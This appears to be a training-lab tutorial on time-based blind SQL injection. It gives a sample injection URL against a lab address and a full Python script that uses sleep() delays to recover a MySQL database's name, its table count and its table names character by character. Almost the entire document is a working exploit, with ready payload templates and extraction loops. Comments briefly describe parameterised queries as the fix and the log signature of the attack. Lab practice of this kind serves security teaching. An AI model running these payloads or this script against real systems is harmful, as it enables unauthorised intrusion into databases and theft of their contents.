http://43.247.91.228:84/Less-1/?id=1' and if(length(database())=8, sleep(5), 0) --+

Note: http://43.247.91.228:84/Less-1/ is the address of the lab (target range). When this request is sent, the response is delayed by 5 seconds if the database name is 8 characters long; otherwise the response comes back immediately (provided the network conditions are not too bad). The Python script below uses this sleep() delay to guess the length of the database name.
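import requests

# Time-based blind SQL injection against the lab's /Less-1/ page.
#
# Every template closes the quoted id value with ', appends a condition of the
# form if(<guess>, sleep(5), 0), and comments out the rest of the query with
# --+ (the + decodes to the space MySQL requires after --). The page returns no
# query output for these requests, so the only signal is timing: a correct
# guess makes the response take at least 5 seconds.
#
# Defender's view: the technique only works if the id parameter is concatenated
# into the SQL text; a parameterised query removes the injection point. In
# access logs the run appears as a long series of GETs whose query string
# contains sleep( and information_schema, with the correct guesses standing out
# as responses of 5 s or more.
url1 = (
    "http://43.247.91.228:84/Less-1/?id=1' and if "
    "(length(database())={_}, sleep(5), 0) --+"
)
url2 = (
    "http://43.247.91.228:84/Less-1/?id=1' and if "
    "(ascii(substr(database(),{_},1))={__}, sleep(5), 0) --+"
)
url3 = (
    "http://43.247.91.228:84/Less-1/?id=1' and if "
    "((select count(*) from information_schema.tables "
    "where table_schema={_})={__}, sleep(5), 0) --+"
)
url4 = (
    "http://43.247.91.228:84/Less-1/?id=1' and if "
    "(ascii(substr((select table_name from information_schema.tables "
    "where table_schema={_} limit {__},1),{___},1))={____}, sleep(5), 0) --+"
)


def getLength(n):
    """Guess the length of the current database name.

    Args:
        n: largest length to try; candidates 1..n are tested in order.

    Returns:
        The first length whose request was delayed, or 0 if none was.
    """
    for i in range(1, n + 1):
        payload = url1.format(_=i)
        print(payload)
        ans = requests.get(payload)
        # A response of 5 s or more means the if() condition was true. A slow
        # network produces the same delay, so a hit is only as reliable as the
        # link to the lab.
        if ans.elapsed.seconds >= 5:
            return i
    return 0


def getName(length):
    """Guess the current database name one character at a time.

    Args:
        length: number of characters in the name, as found by getLength().

    Returns:
        The recovered name. A position for which no ASCII code 1..127
        triggered the delay is skipped, so the result may be shorter than
        `length`; it is the empty string if nothing matched.
    """
    database = ""
    for i in range(1, length + 1):
        for j in range(1, 128):
            payload = url2.format(_=i, __=j)
            print(payload)
            ans = requests.get(payload)
            if ans.elapsed.seconds >= 5:
                database += chr(j)
                break
    return database


def getTablesNum(database, n):
    """Guess how many tables the database holds.

    Args:
        database: database name; it is wrapped in single quotes before being
            placed in the table_schema comparison.
        n: largest table count to try.

    Returns:
        The first count whose request was delayed, or 0 if none was.
    """
    for i in range(1, n + 1):
        payload = url3.format(_="'" + database + "'", __=i)
        print(payload)
        ans = requests.get(payload)
        if ans.elapsed.seconds >= 5:
            return i
    return 0


def getTablesName(database, tablesNum, tableNameLength):
    """Guess the name of every table in the database.

    Args:
        database: database name, quoted the same way as in getTablesNum().
        tablesNum: number of tables to read.
        tableNameLength: number of character positions probed per table;
            longer names are cut off at this length, and positions past the
            end of a shorter name match nothing and are skipped.

    Returns:
        A list with one recovered name per table, in `limit` offset order.
    """
    tables = []
    for i in range(1, tablesNum + 1):
        table = ""
        for j in range(1, tableNameLength + 1):
            for k in range(1, 128):
                # limit is zero-based, hence i - 1 for the i-th table.
                payload = url4.format(
                    _="'" + database + "'", __=i - 1, ___=j, ____=k
                )
                print(payload)
                ans = requests.get(payload)
                if ans.elapsed.seconds >= 5:
                    table += chr(k)
                    break
        tables.append(table)
    return tables


if __name__ == "__main__":
    length = getLength(10)
    database = getName(length)
    tablesNum = getTablesNum(database, 10)
    tables = getTablesName(database, tablesNum, 8)
    print("length of database name: " + str(length))
    print("Database name: " + database)
    print("the number of tables in the database: " + str(tablesNum))
    print("all tables as follows: ")
    for table in tables:
        print(table)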